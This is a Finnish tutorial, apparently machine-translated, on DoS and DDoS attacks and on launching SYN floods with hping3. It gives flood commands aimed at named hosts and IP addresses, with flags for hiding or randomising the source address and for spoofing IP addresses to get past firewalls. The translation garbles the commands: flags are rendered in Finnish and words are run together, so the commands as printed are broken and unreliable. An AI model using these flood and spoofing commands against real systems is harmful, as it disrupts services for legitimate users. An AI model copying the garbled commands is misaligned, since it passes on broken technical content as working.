DOS -hyökkäykset
Palvelunestohyökkäys (DOS) on hyvin yksinkertainen tekniikka palvelujen saatavuuden estämiseksi (siksi sitä kutsutaan palvelunestohyökkäykseksi). Tämä hyökkäys koostuu kohteen ylikuormittamisesta ylisuurilla paketeilla tai suurella määrällä niitä.
Vaikka tämä hyökkäys on erittäin helppo toteuttaa, se ei vaaranna kohteen tietoja tai yksityisyyttä, mutta se ei ole tunkeutuva hyökkäys ja sen tarkoituksena on vain estää pääsy kohteeseen.
Lähettämällä tietyn määrän paketteja kohde ei pysty käsittelemään hyökkääjiä estämään palvelinta palvelemasta laillisia käyttäjiä.
DOS -hyökkäykset suoritetaan yhdestä laitteesta, joten ne on helppo pysäyttää estämällä hyökkääjän IP -osoite, mutta hyökkääjä voi muuttaa ja jopa väärentää (kloonata) kohde -IP -osoitteen, mutta palomuurien ei ole vaikea käsitellä tällaisia hyökkäyksiä , toisin kuin mitä tapahtuu DDOS -hyökkäyksille.
DDOS -hyökkäykset
Hajautettu palvelunestohyökkäys (DDOS) on samanlainen kuin DOS -hyökkäys, mutta se suoritetaan eri solmuista (tai eri hyökkääjistä) samanaikaisesti. Yleensä DDOS -hyökkäykset suoritetaan botnet -verkoissa. Botnetit ovat automaattisia komentosarjoja tai ohjelmia, jotka tartuttavat tietokoneita suorittamaan automaattisen tehtävän (tässä tapauksessa DDOS -hyökkäyksen). Hakkeri voi luoda botnetin ja saastuttaa monet tietokoneet, joista botnetit käynnistävät DOS -hyökkäyksiä, ja se, että monet botnetit ampuvat samanaikaisesti, muuttavat DOS -hyökkäyksen DDOS -hyökkäykseksi (siksi sitä kutsutaan hajautetuksi).
Tietenkin on poikkeuksia, joissa todelliset ihmishyökkääjät tekivät DDOS -hyökkäyksiä, esimerkiksi tuhansien ihmisten maailmanlaajuisesti yhdistämä hakkerit -ryhmä Anonymous käytti tätä tekniikkaa hyvin usein sen helpon käyttöönoton vuoksi (se vaati vain vapaaehtoisia, jotka kertoivat syystään), Esimerkiksi Anonyymi jätti Gaddafin Libyan hallituksen kokonaan irti hyökkäyksen aikana, Libyan valtio jäi puolustuskyvyttömäksi tuhansien hyökkääjien edessä ympäri maailmaa.
Tämäntyyppisiä hyökkäyksiä, kun niitä suoritetaan useista eri solmuista, on erittäin vaikea estää ja pysäyttää ja ne vaativat yleensä erikoislaitteistoa, koska palomuurit ja puolustussovellukset eivät ole valmiita käsittelemään tuhansia hyökkääjiä samanaikaisesti. Tämä ei koske hping3: ta, suurin osa tämän työkalun kautta tehdyistä hyökkäyksistä estetään puolustuslaitteilla tai ohjelmistoilla, mutta se on hyödyllinen paikallisverkoissa tai huonosti suojattuja kohteita vastaan.
Tietoja hpingista3
Työkalun hping3 avulla voit lähettää manipuloituja paketteja. Tämän työkalun avulla voit hallita pakettien kokoa, määrää ja pirstoutumista ylikuormittaaksesi kohteen ja ohittaaksesi tai hyökätäksesi palomuureihin. Hping3 voi olla hyödyllinen tietoturva- tai valmiustestaustarkoituksiin, sillä sen avulla voit testata palomuurien tehokkuuden ja pystyäkö palvelin käsittelemään suuren määrän paketteja. Alta löydät ohjeet hping3: n käyttämiseen turvallisuustestaustarkoituksiin.
DDOS -hyökkäysten aloittaminen hping3: lla:
Debian- ja Linux -pohjaisissa jakeluissa voit asentaa hping3: n suorittamalla:
#sopivaAsentaahping3-jaYksinkertainen DOS (ei DDOS) hyökkäys olisi:
#sudohping3-S --tulva -V -p 80170,155.9.185Missä:
sudo: antaa tarvittavat oikeudet hping3: n suorittamiseen.
hping3: kutsuu hping3 -ohjelmaa.
-S: määrittää SYN -paketit.
-tulva: ampua harkintasi mukaan, vastaukset jätetään huomiotta (siksi vastauksia ei näytetä) ja paketit lähetetään mahdollisimman nopeasti.
-V: Monisanaisuus.
-s 80: portti 80, voit korvata tämän numeron palvelulle, jonka haluat hyökätä.
170.155.9.185: kohde -IP.
Tulva käyttäen SYN -paketteja porttia 80 vastaan:
Seuraava esimerkki kuvaa SYN -hyökkäystä lacampora.orgia vastaan:
#sudohping3 lacampora.org-q -n -d 120 -S -p 80 --tulva -ja lähdeMissä:
Lacampora.org: on tavoite
-q: lyhyt lähtö
-n: näytä kohde -IP isännän sijaan.
-d 120: aseta paketin koko
-ja lähde: piilota IP -osoite.
Seuraava esimerkki esittää toisen mahdollisen tulvan esimerkin:
SYN -tulva porttia 80 vastaan:
#sudohping3-ja lähdeivan.com-S -q -p 80 --tulvaHping3: n avulla voit myös hyökätä kohteisiisi väärennetyllä IP -osoitteella, jotta voit ohittaa palomuurin, voit jopa kloonata itse kohde -IP: n tai minkä tahansa sallitun osoitteen (voit saavuttaa sen esimerkiksi Nmapin tai haistaa kuunnellaksesi liitännät).
Syntaksi olisi:
#sudohping3-kohteeseen <FAKE IP> <kohde> -S -q -p 80 -nopeammin -c2Tässä käytännön esimerkissä hyökkäys näyttäisi:
#sudohping3-kohteeseen190.0.175.100 190.0.175.100-S -q -p 80 -nopeammin -c2Toivottavasti pidit tätä hping3 -opetusohjelmaa hyödyllisenä. Jatka Linuxin seuraamistaVinkkejä ja päivityksiä Linuxista ja verkostoitumisesta.